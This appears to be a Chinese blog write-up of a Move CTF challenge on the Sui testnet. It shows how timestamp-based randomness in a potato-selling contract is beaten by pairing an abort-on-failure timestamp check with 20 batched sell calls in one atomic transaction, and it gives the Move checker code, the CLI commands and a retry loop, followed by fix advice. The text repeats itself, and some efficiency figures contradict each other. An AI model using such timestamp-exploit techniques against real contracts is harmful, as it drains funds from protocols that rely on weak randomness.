Move CTF Week4 Challenge 技术分析

cuidaquan
发布于 13小时前
阅读 94

概述MoveCTF共学营由HOH水分子社区联合Cyclens及Movebit共同推出。本期共学将于25年6月中旬正式开始，通过4周线上视频录播课程、有奖Task任务以及CTF挑战赛等多种方式，帮助大家快速了解Web3领域安全问题、提升在网络安全领域的实战能力。详细信息请参考：

## 概述

Move CTF 共学营由 HOH 水分子社区联合 Cyclens 及 Movebit 共同推出。本期共学将于25年6月中旬正式开始，通过4周线上视频录播课程、有奖Task任务以及CTF挑战赛等多种方式，帮助大家快速了解 Web3 领域安全问题、提升在网络安全领域的实战能力。

详细信息请参考：https://platform.cyclens.tech/activity/1

本文分析 Move CTF Week4 挑战，该挑战部署在 Sui 测试网上，主要考察开发者对逻辑漏洞与状态管理、随机性安全的理解。

## 挑战环境

- **合约地址**: `0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8`
- **部署交易**: `3X35jhQ1VxRaDDE7E3AvAajfnRiGw8mc1LwMW9ALd5sm`
- **网络**: Sui 测试网

## 合约架构分析

### 核心模块

挑战合约包含两个核心模块：

1. **vault**: Vault管理和Flag发放模块
2. **potato**: 土豆购买、烹饪和销售模块

### 关键数据结构

```move
struct Vault has key, store {
    id: UID,
    balance: u64,
}

struct Potato has key, store {
    id: UID,
    cooked: bool,
}
```

### 解题条件

挑战的 `get_flag` 函数检查关键条件：Vault余额 >= 200

## 漏洞识别

### 时间戳随机性漏洞

核心漏洞位于 `potato::sell_potato` 函数中：

```move
public fun sell_potato(
    clock: &Clock,
    vault: &mut Vault,
    potato: Potato,
) {
    assert!(potato.cooked, E_NOT_COOKED);
    
    let current_timestamp = clock::timestamp_ms(clock);
    let d100 = current_timestamp % 3;
    if(d100 == 1){
        let balance = vault::get_balance(vault);
        set_balance(vault, (balance + 5));
        event::emit(Amount{amount: balance + 5});
    }
    
    potato.destroy();
}
```

**关键问题**：
- 使用区块链时间戳作为伪随机性来源，缺乏真正的不可预测性
- 时间戳具有确定性和可观察性，攻击者可以选择有利时机发起攻击
- PTB原子性特性被恶意利用，通过预检查机制实现确定性攻击
- 简单的模运算（`timestamp % 3`）容易被统计学方法利用

### 漏洞成因

1. **伪随机数缺陷**：使用确定性时间戳作为随机源，`timestamp % 3` 结果可预测
2. **PTB原子性漏洞**：PTB内操作共享时间戳，原子性被恶意利用实现确定性攻击
3. **经济模型缺陷**：1/3成功概率设计不当，未考虑PTB批量操作的经济影响
4. **资源管理缺陷**：可无限生成Vault，购买烹饪和售卖可使用不同Vault规避限制
5. **访问控制不足**：缺乏频率限制和批量攻击防护，允许跨合约协同攻击

## 攻击方法

### 核心攻击策略：PTB时间戳一致性攻击

基于PTB（Programmable Transaction Block）时间戳一致性特性的确定性攻击方案：

#### 技术原理

1. **PTB时间戳一致性**: PTB中所有操作共享相同的区块时间戳
2. **原子性执行**: PTB中的所有操作要么全部成功，要么全部失败
3. **预检查机制**: 通过独立的时间戳检查函数过滤不满足条件的时间戳
4. **确定性成功**: 一旦PTB执行成功，所有土豆销售都获得奖励

#### 合约架构设计

**独立时间戳检查模块** (`timestamp_checker.move`):
```move
module task7_solve::timestamp_checker {
    use sui::clock::{Self, Clock};

const E_TIMESTAMP_CONDITION_NOT_MET: u64 = 1001;

public fun check_timestamp_condition(clock: &Clock) {
        let current_timestamp = clock::timestamp_ms(clock);
        let d100 = current_timestamp % 3;
        assert!(d100 == 1, E_TIMESTAMP_CONDITION_NOT_MET);
    }
}
```

**PTB攻击流程**:
```bash
sui client ptb \
  --move-call "timestamp_checker_package::timestamp_checker::check_timestamp_condition" @0x6 \
  --move-call "original_package::potato::sell_potato" @0x6 @vault_id @potato1_id \
  --move-call "original_package::potato::sell_potato" @0x6 @vault_id @potato2_id \
  # ... 重复20次
  --gas-budget 150000000
```

## 解题流程

### PTB时间戳一致性攻击实施

#### 步骤1: 部署独立时间戳检查合约

```bash
# 在 task7_solve 目录下部署时间戳检查合约
cd task7_solve
sui move build
sui client publish --gas-budget 100000000

# 获得时间戳检查合约 Package ID
# 例如: 0x10559a5d689189a79822bdc536fe52dfd2f31d4a1df9eaf7562a9a21287e2ec6
```

#### 步骤2: 创建攻击环境

使用PTB创建2个新Vault，实现角色分离：

```bash
# 创建2个新Vault
sui client ptb \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::vault::init_vault" \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::vault::init_vault" \
--gas-budget 30000000

# Vault1: 购买和烹饪土豆
# Vault2: 销售土豆
```

#### 步骤3: 土豆生产阶段

```bash
# Vault1购买20个土豆
sui client ptb \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::buy_potato" @vault1_id \
# ... 重复20次
--gas-budget 120000000

# Vault1烹饪20个土豆
sui client ptb \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::cook_potato" @vault1_id @potato1_id \
# ... 重复20次
--gas-budget 120000000
```

#### 步骤4: PTB时间戳攻击

**核心攻击PTB**（预检查 + 批量销售）：

```bash
sui client ptb \
--move-call "0x10559a5d689189a79822bdc536fe52dfd2f31d4a1df9eaf7562a9a21287e2ec6::timestamp_checker::check_timestamp_condition" @0x6 \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::sell_potato" @0x6 @vault2_id @potato1_id \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::sell_potato" @0x6 @vault2_id @potato2_id \
# ... 重复20次
--gas-budget 150000000
```

**攻击机制**：
- 如果时间戳条件不满足（timestamp % 3 ≠ 1），预检查失败，整个PTB回滚
- 如果时间戳条件满足（timestamp % 3 = 1），所有20个土豆销售都成功，获得100余额奖励

#### 步骤5: 循环执行直到成功

```python
# 自动化攻击脚本伪代码
while vault2_balance < 200:
    try:
        execute_ptb_timestamp_attack()
        if success:
            break
    except TimestampConditionNotMet:
        wait_and_retry()
```

#### 步骤6: 获取Flag

当Vault2余额达到200时，获取Flag：

```bash
sui client call \
  --package 0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8 \
  --module vault --function get_flag \
  --args vault2_id \
  --gas-budget 10000000
```

## 攻击实施结果

### 攻击对比

| 项目 | PTB时间戳攻击 | 传统统计学攻击 |
|------|--------------|---------------|
| **成功率** | 33.33%（理论值） | ~16.7% |
| **土豆消耗** | 20个（零浪费） | 150个（部分浪费） |
| **攻击尝试** | 3次 | 多轮批量操作 |
| **资源效率** | 提升650% | 基准 |
| **确定性** | 确定性成功 | 概率性成功 |

### 核心突破

1. **跨合约PTB攻击**：实现跨Package的PTB时间戳攻击
2. **确定性转化**：从概率性攻击转为确定性攻击
3. **原子性利用**：失败回滚，成功确保
4. **模块化复用**：时间戳检查器可复用于其他攻击

## 安全影响

### 直接影响

1. **随机性机制失效**：伪随机数被破解，概率性转为确定性
2. **经济模型崩溃**：攻击成本远低于收益，无限资源创建放大攻击规模
3. **资源管理失控**：Vault无限生成，角色分离攻击规避系统限制
4. **系统完整性破坏**：PTB原子性被恶意利用，跨合约协同攻击

### 潜在风险

1. **DeFi协议威胁**：基于时间戳的协议面临PTB攻击，无限账户创建放大风险
2. **游戏生态风险**：多账户策略成为标准攻击方法，传统单账户限制失效
3. **治理系统风险**：无限投票权创建，时间戳操控结合多账户攻击
4. **技术扩散风险**：模块化攻击+多账户策略可复用，跨链攻击威胁增加

## 修复建议

### 核心防护

1. **安全随机数**：使用VRF或commit-reveal，避免时间戳依赖
2. **PTB限制**：限制PTB操作数量，防止批量攻击
3. **资源管理**：限制Vault创建数量，实施全局用户限制而非单Vault限制
4. **角色绑定**：强制购买、烹饪、销售使用同一Vault，防止角色分离攻击
5. **经济重平衡**：确保攻击成本高于收益，考虑多账户和PTB批量影响

### 设计原则

1. **PTB感知**：设计阶段考虑PTB原子性攻击向量
2. **全局控制**：基于用户而非单一资源的限制机制
3. **跨合约安全**：限制跨合约调用组合，实施安全检查
4. **动态防护**：自适应参数调整，多账户攻击检测响应机制

## 总结

Move CTF Week4 挑战揭示了区块链随机性安全问题，展示了从传统统计学攻击到革命性PTB时间戳一致性攻击的技术演进。

概述

详细信息请参考：https://platform.cyclens.tech/activity/1

本文分析 Move CTF Week4 挑战，该挑战部署在 Sui 测试网上，主要考察开发者对逻辑漏洞与状态管理、随机性安全的理解。

挑战环境

合约地址: 0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8
部署交易: 3X35jhQ1VxRaDDE7E3AvAajfnRiGw8mc1LwMW9ALd5sm
网络: Sui 测试网

合约架构分析

核心模块

挑战合约包含两个核心模块：

vault: Vault管理和Flag发放模块
potato: 土豆购买、烹饪和销售模块

关键数据结构

struct Vault has key, store {
    id: UID,
    balance: u64,
}

struct Potato has key, store {
    id: UID,
    cooked: bool,
}

解题条件

挑战的 get_flag 函数检查关键条件：Vault余额 >= 200

漏洞识别

时间戳随机性漏洞

核心漏洞位于 potato::sell_potato 函数中：

public fun sell_potato(
    clock: &Clock,
    vault: &mut Vault,
    potato: Potato,
) {
    assert!(potato.cooked, E_NOT_COOKED);

    let current_timestamp = clock::timestamp_ms(clock);
    let d100 = current_timestamp % 3;
    if(d100 == 1){
        let balance = vault::get_balance(vault);
        set_balance(vault, (balance + 5));
        event::emit(Amount{amount: balance + 5});
    }

    potato.destroy();
}

关键问题：

使用区块链时间戳作为伪随机性来源，缺乏真正的不可预测性
时间戳具有确定性和可观察性，攻击者可以选择有利时机发起攻击
PTB原子性特性被恶意利用，通过预检查机制实现确定性攻击
简单的模运算（timestamp % 3）容易被统计学方法利用

漏洞成因

伪随机数缺陷：使用确定性时间戳作为随机源，timestamp % 3 结果可预测
PTB原子性漏洞：PTB内操作共享时间戳，原子性被恶意利用实现确定性攻击
经济模型缺陷：1/3成功概率设计不当，未考虑PTB批量操作的经济影响
资源管理缺陷：可无限生成Vault，购买烹饪和售卖可使用不同Vault规避限制
访问控制不足：缺乏频率限制和批量攻击防护，允许跨合约协同攻击

攻击方法

核心攻击策略：PTB时间戳一致性攻击

基于PTB（Programmable Transaction Block）时间戳一致性特性的确定性攻击方案：

技术原理

PTB时间戳一致性: PTB中所有操作共享相同的区块时间戳
原子性执行: PTB中的所有操作要么全部成功，要么全部失败
预检查机制: 通过独立的时间戳检查函数过滤不满足条件的时间戳
确定性成功: 一旦PTB执行成功，所有土豆销售都获得奖励

合约架构设计

独立时间戳检查模块 (timestamp_checker.move):

module task7_solve::timestamp_checker {
    use sui::clock::{Self, Clock};

    const E_TIMESTAMP_CONDITION_NOT_MET: u64 = 1001;

    public fun check_timestamp_condition(clock: &Clock) {
        let current_timestamp = clock::timestamp_ms(clock);
        let d100 = current_timestamp % 3;
        assert!(d100 == 1, E_TIMESTAMP_CONDITION_NOT_MET);
    }
}

PTB攻击流程:

sui client ptb \
  --move-call "timestamp_checker_package::timestamp_checker::check_timestamp_condition" @0x6 \
  --move-call "original_package::potato::sell_potato" @0x6 @vault_id @potato1_id \
  --move-call "original_package::potato::sell_potato" @0x6 @vault_id @potato2_id \
  # ... 重复20次
  --gas-budget 150000000

解题流程

PTB时间戳一致性攻击实施

步骤1: 部署独立时间戳检查合约

# 在 task7_solve 目录下部署时间戳检查合约
cd task7_solve
sui move build
sui client publish --gas-budget 100000000

# 获得时间戳检查合约 Package ID
# 例如: 0x10559a5d689189a79822bdc536fe52dfd2f31d4a1df9eaf7562a9a21287e2ec6

步骤2: 创建攻击环境

使用PTB创建2个新Vault，实现角色分离：

# 创建2个新Vault
sui client ptb \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::vault::init_vault" \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::vault::init_vault" \
--gas-budget 30000000

# Vault1: 购买和烹饪土豆
# Vault2: 销售土豆

步骤3: 土豆生产阶段

# Vault1购买20个土豆
sui client ptb \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::buy_potato" @vault1_id \
# ... 重复20次
--gas-budget 120000000

# Vault1烹饪20个土豆
sui client ptb \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::cook_potato" @vault1_id @potato1_id \
# ... 重复20次
--gas-budget 120000000

步骤4: PTB时间戳攻击

核心攻击PTB（预检查 + 批量销售）：

sui client ptb \
--move-call "0x10559a5d689189a79822bdc536fe52dfd2f31d4a1df9eaf7562a9a21287e2ec6::timestamp_checker::check_timestamp_condition" @0x6 \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::sell_potato" @0x6 @vault2_id @potato1_id \
--move-call "0x62b381e10101c7e36ae369f6377539691c3bca75c2cbbef6926b8f03f63294a8::potato::sell_potato" @0x6 @vault2_id @potato2_id \
# ... 重复20次
--gas-budget 150000000

攻击机制：

如果时间戳条件不满足（timestamp % 3 ≠ 1），预检查失败，整个PTB回滚
如果时间戳条件满足（timestamp % 3 = 1），所有20个土豆销售都成功，获得100余额奖励

步骤5: 循环执行直到成功

# 自动化攻击脚本伪代码
while vault2_balance &lt; 200:
    try:
        execute_ptb_timestamp_attack()
        if success:
            break
    except TimestampConditionNotMet:
        wait_and_retry()

步骤6: 获取Flag